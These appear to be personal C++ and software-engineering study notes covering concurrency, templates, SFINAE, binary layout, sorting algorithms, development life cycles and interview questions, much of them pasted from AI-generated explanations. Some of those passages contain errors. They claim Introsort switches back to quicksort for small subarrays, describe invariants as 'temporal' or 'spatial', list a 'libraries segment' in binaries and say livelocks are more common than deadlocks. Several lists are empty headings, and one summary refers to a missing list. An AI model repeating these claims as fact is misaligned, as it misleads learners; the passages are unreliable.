OpenAI: Invariants are conditions or properties that remain unchanged throughout a process or system. They are characteristics that are maintained at all times, regardless of any external factors or changes. In other words, invariants are rules or principles that are always true and cannot be altered.

In computer science and mathematics, invariants are commonly used to describe properties of algorithms, data structures, or mathematical equations. They can be used to prove the correctness of a program or to analyze the behavior of a system.

Invariants are important because they help ensure the reliability and consistency of a process or system. They act as checkpoints that must be satisfied at all times, and any deviation from an invariant indicates an error or a flaw in the system.

There are different types of invariants, such as loop invariants, which are properties that hold true before and after each iteration of a loop, and class invariants, which are properties that must be maintained by all instances of a class. Invariants can also be temporal, meaning they hold true at a specific point in time, or spatial, meaning they hold true in a specific location or region.

Invariants are closely related to the concept of inductive reasoning, which involves making generalizations based on specific observations. Invariants can be used as the basis for inductive reasoning, as they provide a foundation of truths that can be used to make logical conclusions.

Overall, invariants play a crucial role in ensuring the stability and correctness of processes and systems, and they are an important tool in the fields of computer science, mathematics, and engineering.

Idempotence

A function is idempotent if it can be applied multiple times without changing the outcome. E.g., repeatedly pressing the “on” switch of an “on/off” pair: it’s still on. See Wikipedia.
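
A tiny sketch of the distinction, using a made-up Light type:

#include <cassert>

struct Light {
    bool on = false;
    void turn_on() { on = true; }   // idempotent: repeated calls change nothing
    void toggle()  { on = !on; }    // not idempotent: each call changes the outcome
};

int main() {
    Light light;
    light.turn_on();
    light.turn_on();
    assert(light.on);   // still simply "on"
}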

Race conditions

tl;dr “Race condition: an unfortunate order of execution causes undesirable behaviour.”

OpenAI: A race condition in computer science refers to a situation where the outcome of a program or process depends on the timing or order of events rather than the logical flow of instructions. This can lead to unexpected or incorrect results and can be difficult to predict or debug.

One common type of race condition is a data race, where multiple threads or processes are accessing and modifying the same shared data without proper synchronization. This can result in inconsistent or corrupted data if the operations are not coordinated properly.

Another type is a timing race, where the outcome of a program depends on the precise timing of events, such as user input or network communication. If these events do not occur in the expected order or within a certain timeframe, the program may behave unexpectedly.

Race conditions can also occur in distributed systems, where multiple machines are communicating and coordinating with each other. In this case, network delays or failures can lead to inconsistent or conflicting data.

Race conditions are particularly problematic in parallel and concurrent programming, where multiple threads or processes are running simultaneously and can interfere with each other’s operations. They can also occur in single-threaded programs if there are unexpected interrupts or asynchronous events.

Overall, race conditions can be difficult to detect and debug, as they may only occur under specific circumstances and can be hard to reproduce. Proper synchronization and careful design are necessary to avoid race conditions in computer programs.

Considerations

Deadlocks and livelocks

See the Dining philosophers problem.

A real world example: Ken and Barbie walk over to the barbecue. Ken grabs the last remaining sausage and attempts to acquire the hot sauce; meanwhile, Barbie has already secured the hot sauce and is waiting for the sausage to become available. A sausage cannot be enjoyed without hot sauce, so neither can proceed, and they remain stuck in a deadlock indefinitely.

A livelock occurs when measures are taken to avoid a deadlock, but the measures themselves do not resolve the conflict. For example, Ken and Barbie both agree to put down their respective items and try again; however, they each pick up the same item again and the stand-off continues.

OpenAI: Deadlocks and livelocks are both types of concurrency issues that occur in computer systems. However, they differ in their causes and effects.

  1. Definition
  2. Cause
  3. Effect
  4. Handling
  5. Recovery
  6. Frequency

In summary, deadlocks and livelocks are both concurrency issues that can cause system instability and unresponsiveness. While deadlocks are caused by a circular dependency of resources, livelocks are caused by a communication or synchronization issue between processes. Both can be resolved and recovered from, but livelocks are more common and can be more difficult to detect and handle.

Avoiding deadlocks

Run your code on different numbers of CPUs; it’s interesting how the bottlenecks move around depending on the available resources.
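
Back in C++, the Ken-and-Barbie stand-off above is avoided by acquiring both resources in a single step; a minimal sketch using std::scoped_lock, which applies a deadlock-avoidance algorithm when given several mutexes:

#include <mutex>
#include <thread>

std::mutex sausage;
std::mutex hot_sauce;

void eat() {
    // Locks both mutexes without deadlocking, regardless of the order
    // another thread tries to take them in
    const std::scoped_lock lock{sausage, hot_sauce};
    // ... enjoy ...
}

int main() {
    std::thread ken{eat};
    std::thread barbie{eat};
    ken.join();
    barbie.join();
}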

OpenAI: 1. Use a timeout: Set a timeout for each transaction so that if it takes too long, it will automatically abort. This will prevent transactions from waiting indefinitely and potentially causing a deadlock.

  2. Avoid long-running transactions: Long-running transactions increase the chances of a deadlock occurring. Try to break down large transactions into smaller ones to reduce their duration.

  3. Use the correct isolation level: Make sure to use the appropriate isolation level for your transactions. For example, using the READ COMMITTED isolation level can prevent dirty reads and reduce the chances of a deadlock occurring.

  4. Access resources in a consistent order: To prevent circular dependencies, make sure all transactions access resources in the same order. This will prevent one transaction from blocking another.

  5. Keep transactions short and simple: The longer and more complex a transaction is, the more likely it is to cause a deadlock. Try to keep transactions short and simple to minimize the chances of a deadlock occurring.

  6. Use indexes: Use indexes on tables to improve query performance and reduce the time a transaction holds a lock on a resource. This will decrease the chances of another transaction waiting for the same resource and causing a deadlock.

  7. Avoid holding locks unnecessarily: Only hold a lock for the minimum amount of time necessary. This will reduce the chances of a deadlock occurring and improve overall system performance.

  8. Monitor and troubleshoot: Use tools to monitor your database for deadlocks and troubleshoot any issues that arise. This will help you identify and fix the root cause of the deadlock.

  9. Use a queuing mechanism: Implement a queuing mechanism to handle concurrent requests for the same resource. This will ensure that only one transaction can access the resource at a time, preventing deadlocks from occurring.

  10. Properly handle errors: Make sure to handle errors in your code properly. This includes catching and handling database errors and retrying transactions if necessary. Proper error handling can prevent unexpected failures and reduce the chances of a deadlock occurring.

See also

Additionally

Synchronising threads

OpenAI: Mutex and semaphore are both synchronization mechanisms used in multithreaded programming to prevent race conditions and ensure thread safety. They both provide a way for threads to access shared resources without interfering with each other. However, they have some key differences in terms of their functionality and usage.

  1. Purpose: Mutex (short for mutual exclusion) is used to ensure that only one thread can access a shared resource at a time. It provides a lock that threads must acquire before accessing the resource, and release after they are done. This ensures that the resource is not accessed by multiple threads simultaneously, preventing data corruption.

Semaphore, on the other hand, is used to control access to a shared resource that has a limited capacity. It maintains a count of the number of threads that can access the resource at a given time. Once the count reaches zero, the semaphore will block any further attempts to access the resource until it is released by another thread.

  2. Types: Mutex is a binary synchronization mechanism, meaning it has only two states - locked and unlocked. It is typically used to protect critical sections of code where only one thread should be allowed to execute at a time.

Semaphore, on the other hand, can be either binary or counting. A binary semaphore has two states - locked and unlocked, similar to a mutex. However, a counting semaphore can have a value greater than one, indicating the number of threads that can access the shared resource simultaneously.

  3. Usage: Mutex is commonly used to protect access to shared variables, data structures, and critical sections of code. It is also used in synchronization primitives such as monitors and condition variables.

Semaphore is often used to control access to resources with a limited capacity, such as a shared pool of database connections, or a fixed number of threads that can access a resource at a time.

  4. Implementation: Mutex is typically implemented using a lock or a flag that is set when a thread acquires the lock and released when the thread releases it. This ensures that only one thread can acquire the lock at a time, and other threads will have to wait until the lock is released.

Semaphore is implemented using a counter that tracks the number of available resources. When a thread wants to access the resource, it decrements the counter, and when it is done, it increments the counter. If the counter reaches zero, the semaphore will block any further attempts to access the resource until it is signaled by another thread.

In summary, mutex and semaphore are both synchronization mechanisms used to coordinate access to shared resources in multithreaded environments. Mutex is used when only one thread should access the resource at a time, while semaphore is used to control access to a resource with a limited capacity.

See Mutex vs Semaphore.

This is getting into the weeds, but mutexes and the data they protect can happily be declared consecutively in the code; so consider what this might mean when both the mutex and the data end up in the same cache line.
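
A minimal sketch of the two primitives discussed above, using C++20’s std::counting_semaphore; the limit of two concurrent workers and the shared counter are arbitrary choices.

#include <mutex>
#include <semaphore>
#include <thread>
#include <vector>

std::mutex m;
int counter = 0;                       // shared data guarded by m

std::counting_semaphore<2> slots{2};   // at most two workers in the section

void work() {
    slots.acquire();                   // semaphore: limit concurrency
    {
        const std::scoped_lock lock{m};  // mutex: one writer at a time
        ++counter;
    }
    slots.release();
}

int main() {
    std::vector<std::thread> threads;
    for (int i = 0; i < 8; ++i)
        threads.emplace_back(work);
    for (auto& t : threads)
        t.join();
}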

Threads versus processes

tl;dr A thread is a branch of execution. A process can consist of multiple threads.

OpenAI: Threads and processes are both units of execution within a computer system, but they have some key differences. Here’s a breakdown of how they compare:

  1. Definition:
  2. Creation:
  3. Resource sharing:
  4. Communication:
  5. Overhead:
  6. Context switching:
  7. Parallelism:
  8. Concurrency:

In summary, threads and processes have different characteristics and are used for different purposes. Threads are more lightweight and efficient for tasks that require parallelism and resource sharing, while processes provide better isolation and security for independent tasks.

Thread best practices

References


Template metaprogramming

“Generic programming is why we can’t have nice things” – Andrei Alexandrescu

Template metaprogramming is a programming technique used to perform computations and manipulate data at compile time rather than at run time. It is based on the use of templates, which are code patterns that can be customized with different data types and values. This allows for the creation of generic code that can be reused for different scenarios, increasing code efficiency and reducing the need for manual coding.

In template metaprogramming, templates are used to define types and functions that can be evaluated and executed by the compiler, producing code specific to the given template parameters. This allows for the creation of code that can perform complex operations and calculations at compile time, resulting in faster and more efficient code.

One of the key features of template metaprogramming is the ability to perform type deduction and type traits, which allow the compiler to determine the properties and behaviors of a given type. This enables the creation of code that is highly adaptable and can handle different data types without the need for explicit type declarations.

Another important aspect of template metaprogramming is the use of template specialization, which allows for the creation of specialized versions of a template for specific data types or scenarios. This can be used to optimize code for certain situations or to handle edge cases that may not be covered by the generic template.

Template metaprogramming is commonly used in modern C++ programming, where it is used to implement powerful libraries and frameworks such as the Standard Template Library (STL) and Boost. It can also be used to create efficient and flexible data structures, algorithms, and other complex systems.

Overall, template metaprogramming is a powerful technique for creating efficient and reusable code that can be customized for different scenarios. Its use can result in faster and more optimized programs, making it an important tool for modern software development.

Templates in the C++ Standard Library allow for generic programming, meaning that the same code can be used with different data types. This is achieved by writing code that is independent of specific data types, but instead uses template parameters to represent them.

The most common use of templates in the C++ Standard Library is in containers, such as vector, list, and map. These containers are able to hold any data type because they are implemented using templates. For example, a vector can hold integers, strings, or even user-defined objects, without needing to write separate code for each data type.

Templates are also used in algorithms, which are functions that operate on containers. These algorithms are written in a generic way, so they can be used with any container that supports the necessary operations. This allows for efficient and flexible programming, as the same algorithm can be used with different containers.

Another use of templates in the C++ Standard Library is in smart pointers, such as unique_ptr and shared_ptr. These allow for automatic memory management, and their templates allow them to be used with different data types.

In addition, templates are used in other parts of the Standard Library, such as the tuple class, regular expressions, and I/O streams. They provide a powerful and flexible way to write code that is reusable and adaptable to different data types.

Overall, templates in the C++ Standard Library are essential for generic programming, enabling the creation of versatile and efficient code that can be used with a wide variety of data types. They are a key feature of the language that make it popular for both low-level system programming and high-level application development.

SFINAE

SFINAE (Substitution Failure Is Not An Error) is a concept in C++ that allows the compiler to bypass template errors and continue compiling the code, instead of throwing an error. This is achieved by using template specialization and overloading.

SFINAE allows the compiler to choose the best-matched template based on the available template parameters. If the compiler is unable to substitute the template parameters, it will simply ignore the error and move on to the next available template. This allows for more flexibility and customization in template-based programming.

An example of SFINAE is when using the "enable_if" template, which allows the compiler to select a specific template based on a condition. If the condition is not met, the compiler will simply move on to the next available template, instead of throwing an error.

SFINAE is commonly used in advanced C++ programming, particularly in template metaprogramming, to enable more complex type checking and customization. It helps to make templates more flexible and robust, as well as improving compile-time efficiency.
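
A minimal sketch of the enable_if technique mentioned above (concepts or if constexpr would be the more modern spellings); the describe function is made up.

#include <iostream>
#include <type_traits>

// Selected only when T is an integral type; otherwise substitution fails
// silently and this overload is removed from the candidate set.
template <typename T, std::enable_if_t<std::is_integral_v<T>, int> = 0>
void describe(T) { std::cout << "integral\n"; }

// Selected only when T is a floating-point type
template <typename T, std::enable_if_t<std::is_floating_point_v<T>, int> = 0>
void describe(T) { std::cout << "floating point\n"; }

int main() {
    describe(42);    // integral
    describe(3.14);  // floating point
}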


Binary structure

See Linux Debuginfo Formats - DWARF, ELF, dwo, dwp - What are They All? - Greg Law - CppCon 2022.

Section | Description
stack | Local variables (grows downwards)
heap | Dynamic memory (grows upwards)
.rodata | Read-only data
.bss | Uninitialised data
.data | Initialised data
.text | Code
  1. Header: The header segment contains information about the binary, such as the program’s entry point, the location and size of other segments, and other metadata.

  2. Code segment: Also known as the text segment, this contains the instructions that make up the program’s executable code. These instructions are typically in machine code or assembly language.

  3. Data segment: This segment contains initialized global and static variables used by the program. It is typically divided into two sub-segments: the read-only data segment and the read-write data segment.

  4. BSS segment: Standing for "Block Started by Symbol", the BSS segment contains uninitialized global and static variables. This segment is usually located after the data segment in memory.

  5. Stack segment: This segment is used for storing local variables and function parameters during the execution of the program. It is a last-in-first-out (LIFO) data structure, meaning that the most recently added data is the first to be removed.

  6. Heap segment: The heap segment is used for dynamic memory allocation during the program’s execution. It is a region of memory that can be dynamically expanded or shrunk as needed.

  7. Libraries segment: This segment contains code and data from external libraries that are linked to the program. These libraries may include functions and resources that the program needs to run.

  8. Symbols table: This segment contains a list of symbols used in the program, such as function names, global variables, and constants. It is used by the linker to resolve references to these symbols from different segments.

  9. Relocation table: The relocation table contains information about the location of code and data segments, as well as the addresses of external symbols. This information is used by the linker to adjust memory addresses during the linking process.

  10. Debugging information: This segment contains data used for debugging the program, such as line numbers, variable names, and other metadata. It is typically only included in development versions of the program.


Algorithms

Jonathan Boccara’s CppCon talk 105 STL Algorithms in Less Than an Hour is well worth a watch for a quick overview.

Sorting

Quicksort is the poster boy of sorting algorithms.

Quicksort is a popular sorting algorithm that uses a divide-and-conquer approach to sort a list of items. It works by selecting a pivot element from the list, partitioning the list into two sublists based on the pivot, and then recursively sorting the sublists. The time complexity of quicksort can vary depending on the implementation, but in general, it has an average-case time complexity of O(nlogn) and a worst-case time complexity of O(n^2).

The best-case time complexity of quicksort occurs when the pivot is chosen as the median element of the list. In this case, the algorithm will divide the list into two sublists of equal size, resulting in a balanced partition. This leads to a time complexity of O(nlogn), as the recursion is log n levels deep and each level takes O(n) time to partition the list.

In the average case, the time complexity of quicksort is also O(nlogn). This is because the pivot is chosen randomly, and in most cases, it will result in a balanced partition. However, there is a small chance that the pivot will be chosen as the minimum or maximum element, resulting in an unbalanced partition and a worst-case time complexity of O(n^2).

In the worst case, the time complexity of quicksort is O(n^2). This occurs when the pivot is consistently chosen as the minimum or maximum element, resulting in an unbalanced partition. In this case, the algorithm will make n recursive calls, each of which takes O(n) time to partition the list. This leads to a total time complexity of O(n^2).

Overall, the time complexity of quicksort is largely dependent on the choice of pivot element and the initial ordering of the list. In the average case, it has a relatively efficient time complexity of O(nlogn), but in the worst case, it can be as inefficient as O(n^2).

Below is a Python implementation just for fun. But how is it implemented in C++?

Quicksort is a popular sorting algorithm that follows the divide and conquer approach. It works by partitioning an array into two subarrays, one with elements smaller than a chosen pivot element and the other with elements larger than the pivot. The subarrays are then recursively sorted until the entire array is sorted.

Here is an implementation of quicksort in Python:

# function to perform quicksort
def quicksort(array):
    # base case: an array with 0 or 1 elements is already sorted
    if len(array) < 2:
        return array
    
    # choose a pivot element (can be any element from the array)
    pivot = array[0]
    
    # partition the array into two subarrays
    smaller = [i for i in array[1:] if i <= pivot]
    larger = [i for i in array[1:] if i > pivot]
    
    # recursively sort the subarrays
    smaller = quicksort(smaller)
    larger = quicksort(larger)
    
    # combine the sorted subarrays and the pivot element
    return smaller + [pivot] + larger

# example
arr = [5, 2, 8, 1, 9, 3]

print(quicksort(arr)) # output: [1, 2, 3, 5, 8, 9]

The time complexity of quicksort is O(nlogn) in the average case and O(n^2) in the worst case. The space complexity of an in-place implementation is O(log n) due to the recursive calls; the list-building version above also allocates new sublists at every level.
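
To answer the question above, here is a minimal (and deliberately naive) C++ translation of the same idea using std::partition to split the range in place around a pivot; std::sort itself does something more sophisticated, as described next.

#include <algorithm>
#include <iostream>
#include <iterator>
#include <vector>

// In-place quicksort over a [first, last) range of ints
void quicksort(std::vector<int>::iterator first,
               std::vector<int>::iterator last) {
    if (std::distance(first, last) < 2)
        return;   // 0 or 1 elements: already sorted

    const int pivot = *first;

    // Move everything smaller than the pivot to the front
    const auto split = std::partition(
        std::next(first), last, [pivot](int x) { return x < pivot; });

    // Put the pivot between the two partitions and recurse on each side
    std::iter_swap(first, std::prev(split));
    quicksort(first, std::prev(split));
    quicksort(split, last);
}

int main() {
    std::vector arr{5, 2, 8, 1, 9, 3};
    quicksort(arr.begin(), arr.end());
    for (const int x : arr)
        std::cout << x << ' ';   // 1 2 3 5 8 9
}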

std::sort uses Introsort

Introsort is a sorting algorithm that combines the efficiency of quicksort with the worst-case time complexity guarantee of heap sort. It was first introduced by David Musser in 1997.

The algorithm starts by using quicksort to partition the input array into smaller subarrays. However, to avoid the worst-case time complexity of quicksort (O(n^2)), Introsort switches to heap sort when the recursion depth exceeds a certain limit. This limit is usually set to log(n), where n is the number of elements in the array.

Heap sort is used because it guarantees a worst-case time complexity of O(nlogn) and is not affected by the initial ordering of the elements. Once the subarrays are small enough, the algorithm switches back to quicksort for efficient sorting.

Introsort also uses a median-of-three partitioning strategy to choose the pivot element for quicksort, which helps avoid the worst-case scenario when the input array is already sorted or nearly sorted.

Overall, Introsort combines the best features of both quicksort and heap sort to achieve efficient sorting with a worst-case time complexity of O(nlogn). It is commonly used in standard library implementations for sorting large data sets.

Introsort is in place but not stable: i.e., equivalent elements are not guaranteed to remain in the same order. However, the Standard Library offers stable_ versions of various sorting algorithms.

If additional memory is available, stable_sort remains O(n log n). However, if it fails to allocate, it will degrade to an O(n (log n)^2) algorithm.

https://leanpub.com/cpp-algorithms-guide

Small array threshold

The threshold for switching to insertion sort varies for each compiler.

std::list

std::sort requires random access to the elements, so std::list has its own sort method, but it still (approximately) conforms to O(n log n). It can be implemented with merge sort as moving elements is cheap with a linked list.
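
A quick sketch; note that handing list iterators to std::sort would not compile, because they are bidirectional rather than random access.

#include <iostream>
#include <list>

int main() {
    std::list<int> values{5, 2, 8, 1, 9, 3};

    // std::sort(values.begin(), values.end());  // won't compile: not random access
    values.sort();                               // member function, roughly O(n log n)

    for (const int v : values)
        std::cout << v << ' ';   // 1 2 3 5 8 9
}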

Other sorting algorithms

Considerations for choosing an algorithm: the size of the input, and the type of input (e.g., partially sorted, random).

Sorting algorithms are used to arrange a given set of data in a certain order, typically from least to greatest or vice versa. The complexity of a sorting algorithm refers to the amount of time or space it takes to sort a given set of data. The complexity of a sorting algorithm is typically measured in terms of time complexity and space complexity.

  1. Bubble Sort: Bubble sort is one of the simplest sorting algorithms and has a time complexity of O(n^2). This means that for a set of n elements, the algorithm will take n^2 operations to complete. It compares adjacent elements and swaps them if they are in the wrong order, making multiple passes through the data until it is sorted.

  2. Selection Sort: Selection sort also has a time complexity of O(n^2). It works by finding the smallest element in the unsorted portion of the data and swapping it with the first element in the unsorted portion. It continues to do this until the entire data is sorted.

  3. Insertion Sort: Similar to bubble and selection sort, insertion sort also has a time complexity of O(n^2). However, it is more efficient than the other two as it only swaps elements when necessary, rather than making multiple passes through the data.

  4. Merge Sort: Merge sort has a time complexity of O(nlogn), making it more efficient than the previous three sorting algorithms. It works by dividing the data into smaller sublists, sorting them, and then merging them back together in the correct order.

  5. Quick Sort: Quick sort also has a time complexity of O(nlogn). It works by selecting a pivot element and partitioning the data into two sublists, one with elements smaller than the pivot and one with elements larger than the pivot. It then recursively sorts each sublist until the entire data is sorted.

  6. Heap Sort: Heap sort has a time complexity of O(nlogn) as well. It works by building a heap data structure from the given data and repeatedly removing the root element, which is the largest element in the heap, and placing it at the end of the sorted list.

  7. Radix Sort: Radix sort has a time complexity of O(nk), where n is the number of elements and k is the number of digits in the largest element. It works by sorting the elements based on their digits, starting from the least significant digit to the most significant.

In terms of space complexity, bubble, selection, insertion and heap sort are in-place and require only O(1) additional memory; merge sort requires O(n) auxiliary memory for merging; and quicksort uses O(log n) stack space for its recursive calls.

Overall, merge sort and quick sort are considered to be more efficient in terms of time complexity as they have a time complexity of O(nlogn). However, quick sort has a worst-case time complexity of O(n^2) if the pivot is not chosen properly, making merge sort a more reliable choice. Radix sort is also efficient in terms of time complexity, but it is limited to sorting numbers only. On the other hand, bubble, selection, and insertion sort are considered to be less efficient as they have a time complexity of O(n^2), but they require less additional memory, making them more suitable for small data sets.

All of these are Θ(n log n) in all cases, apart from Timsort, which has a best case of Ω(n), and quicksort, which has a terrible O(n^2) worst case (if we happen to always pick the worst pivot). Quicksort is a good all-rounder with an O(n log n) average case, but it does have an O(n^2) worst case. It is said that this can be avoided by picking the pivot carefully, but an example can be constructed where the chosen pivot is always the worst case.

References

Move semantics

This a large, complicated topic. See C++ Move Semantics - The Complete Guide by Nicolai M. Josuttis.


The Software Development Life cycle (SDLC)

Waterfall versus agile

Construction of a building is often used to describe the software design process. But the analogy breaks down: the building designer only has one attempt to compile the building. You can’t swap out the foundation halfway through.

Actually, in Royce’s later revisions of the model, he stated that the whole process should be done “twice if possible”.

Software validation versus verification

Validation is concerned with checking that the system will meet the customer’s actual needs. Verification will help to determine whether the software is of high quality, but it will not ensure that the system is useful.

Verification is objective (quality), validation is subjective (customer needs).

Validation is the process of checking whether the specification captures the customer’s needs, while verification is the process of checking that the software meets the specification.

See difference between verification and validation.

Waterfall sequence

RADCTDM

Advantages

Disadvantages

When should you use waterfall methodology?

Agile

Stop doing the things that nobody wants

BDD

What to call your test is easy – it’s a sentence describing the next behaviour in which you are interested. How much to test becomes moot – you can only describe so much behaviour in a single sentence. When a test fails, simply work through the process described above – either you introduced a bug, the behaviour moved, or the test is no longer relevant.

Resources

TDD

Test-driven development (TDD) is a software development process that relies on the repetition of a short development cycle: requirements are turned into specific test cases, then the software is improved just enough to pass the new tests. This is in contrast to a process that allows software to be added which is not proven to meet requirements.

As a [X] I want [Y] in order to [Z]

Title: Customer withdraws cash

Scenario 1: Account is in credit


OpenAI generated interview questions

  1. What is the difference between a compiler and an interpreter?

  2. Explain the concept of runtime complexity and how it affects algorithm efficiency.

  3. Can you give an example of a data structure and explain its use case?

  4. What is the difference between a stack and a queue?

  5. How do you handle memory management in programming languages?

  6. What is the difference between a pointer and a reference in C++?

  7. What is the difference between a shallow copy and a deep copy in C++?

  8. Can you explain the concept of inheritance in C++?

  9. How does polymorphism work in C++?

  10. What is the difference between pass by value and pass by reference in C++?